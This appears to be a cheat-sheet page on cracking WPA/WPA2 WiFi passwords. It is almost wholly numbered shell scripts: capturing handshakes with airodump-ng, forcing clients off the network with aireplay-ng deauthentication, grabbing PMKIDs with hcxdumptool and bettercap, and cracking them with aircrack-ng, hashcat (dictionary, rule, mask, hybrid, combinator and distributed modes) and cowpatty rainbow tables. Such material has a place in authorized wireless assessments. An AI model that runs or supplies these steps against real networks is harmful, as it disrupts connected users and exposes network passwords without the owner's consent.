WPA/WPA2 Cracking

Exploitation

WPA2-PSK is the most common home WiFi security. Attacks focus on capturing the 4-way handshake or PMKID and cracking it offline.

4-Way Handshake Capture

Step 1: Start capture on the target network.

01-start-capture.sh

bash

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

Step 2: Deauthenticate a client to force reconnection.
-0: deauth attack, 5: number of deauths, -a: target AP BSSID, -c: target client MAC.

02-deauth.sh

bash

# In another terminal:
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon

Step 3: Wait for "WPA handshake: AA:BB:CC:DD:EE:FF" in airodump. Verify the handshake was captured.

03-verify.sh

bash

aircrack-ng handshake-01.cap

Step 4: Crack with a wordlist using aircrack-ng.

04-crack-cpu.sh

bash

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap

GPU cracking with Hashcat is much faster. First, convert the capture to hashcat format.

05-convert.sh

bash

# Option 1: Using aircrack-ng
aircrack-ng -j handshake handshake-01.cap

# Option 2: Using hcxpcapngtool
hcxpcapngtool -o handshake.hc22000 handshake-01.cap

Crack with hashcat using mode 22000 (WPA-PBKDF2-PMKID+EAPOL).

06-crack-gpu.sh

bash

hashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txt

Use rules for better coverage.

07-crack-rules.sh

bash

hashcat -m 22000 handshake.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule

PMKID Attack (Clientless)

PMKID Attack Overview: Discovered in 2018, this attack extracts the Pairwise Master Key Identifier from the first frame of the 4-way handshake (EAPOL frame 1). No client needed, no handshake required - just association with the AP.

Why PMKID Works

The PMKID is calculated as: HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
Since MAC addresses are known, we can brute force the PMK (Pairwise Master Key) which is derived from the PSK (Pre-Shared Key / WiFi password).

Step 1: Capture PMKID with hcxdumptool (modern method).

08-pmkid-capture.sh

bash

# Install hcxdumptool and hcxtools
sudo apt install hcxdumptool hcxtools

# Capture PMKID (no monitor mode required!)
sudo hcxdumptool -i wlan0 -o pmkid.pcapng --enable_status=15

# Target specific network
sudo hcxdumptool -i wlan0 -o pmkid.pcapng --filterlist_ap=targets.txt --filtermode=2

# Create targets.txt with AP MAC addresses (one per line):
# AA:BB:CC:DD:EE:FF
# 11:22:33:44:55:66

Step 2: Extract PMKID and convert to hashcat format.

09-pmkid-extract.sh

bash

# Convert to hashcat 22000 format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng

# Check if PMKID was captured
cat pmkid.hc22000 | grep "^WPA\*02"

# Output format: WPA*02*PMKID*MAC_AP*MAC_STA*ESSID

Step 3: Crack PMKID with hashcat.

10-pmkid-crack.sh

bash

# Basic dictionary attack
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt

# With rules (best64)
hashcat -m 22000 pmkid.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule

# Mask attack (8 digits)
hashcat -m 22000 pmkid.hc22000 -a 3 ?d?d?d?d?d?d?d?d

# Hybrid attack (wordlist + digits)
hashcat -m 22000 pmkid.hc22000 -a 6 wordlist.txt ?d?d?d?d

# Show cracked passwords
hashcat -m 22000 pmkid.hc22000 --show

Alternative: Use Bettercap to trigger PMKID capture.

11-bettercap-pmkid.sh

bash

sudo bettercap -iface wlan0mon
> wifi.recon on
> wifi.show

# Associate with target AP to trigger PMKID
> wifi.assoc AA:BB:CC:DD:EE:FF

# PMKID will be saved in bettercap session
> set wifi.handshakes.file pmkid.pcap

Advanced Cracking Techniques

Combinator Attack: Combine two wordlists.

12-combinator.sh

bash

# Combine words from two lists
hashcat -m 22000 handshake.hc22000 -a 1 wordlist1.txt wordlist2.txt

# Example: "password" + "123" = "password123"

Rainbow Tables: Pre-computed hashes for common SSIDs.

13-rainbow.sh

bash

# Generate rainbow table for specific SSID
genpmk -f wordlist.txt -d rainbow.db -s "SSID_NAME"

# Use cowpatty with rainbow table
cowpatty -d rainbow.db -r handshake-01.cap -s "SSID_NAME"

# Note: SSID is part of the PMK calculation, so rainbow tables
# are SSID-specific (Common SSIDs: "linksys", "default", "NETGEAR")

Incremental Mask Attack: Target specific password patterns.

14-mask-attacks.sh

bash

# Format: SSID + 4 digits (common for many routers)
hashcat -m 22000 handshake.hc22000 -a 3 MyWiFi?d?d?d?d

# Year patterns (2020-2024)
hashcat -m 22000 handshake.hc22000 -a 3 ?l?l?l?l202?d

# Phone number patterns (XXX-XXXX)
hashcat -m 22000 handshake.hc22000 -a 3 ?d?d?d-?d?d?d?d

# Custom charset (lowercase + numbers only)
hashcat -m 22000 handshake.hc22000 -a 3 -1 ?l?d ?1?1?1?1?1?1?1?1

Distribution Cracking: Use multiple GPUs or cloud instances.

15-distributed.sh

bash

# Limit keyspace for distribution
# Instance 1: crack first 50% of keyspace
hashcat -m 22000 handshake.hc22000 wordlist.txt --skip=0 --limit=5000000

# Instance 2: crack second 50%
hashcat -m 22000 handshake.hc22000 wordlist.txt --skip=5000000

# Restore session if interrupted
hashcat -m 22000 handshake.hc22000 wordlist.txt --session=session1 --restore

⚠️ PMKID Limitations

• Not all routers/APs support PMKID (patched in newer firmware)
• Roaming enabled APs more likely to have PMKID
• If PMKID fails, fall back to traditional 4-way handshake
• WPA3 (SAE) does not use PMKID

WPA/WPA2 Cracking

4-Way Handshake Capture

PMKID Attack (Clientless)

Why PMKID Works

Advanced Cracking Techniques

⚠️ PMKID Limitations

Related Topics

Wireless Pentesting

Evil Twin Attack

Encryption Cheatsheet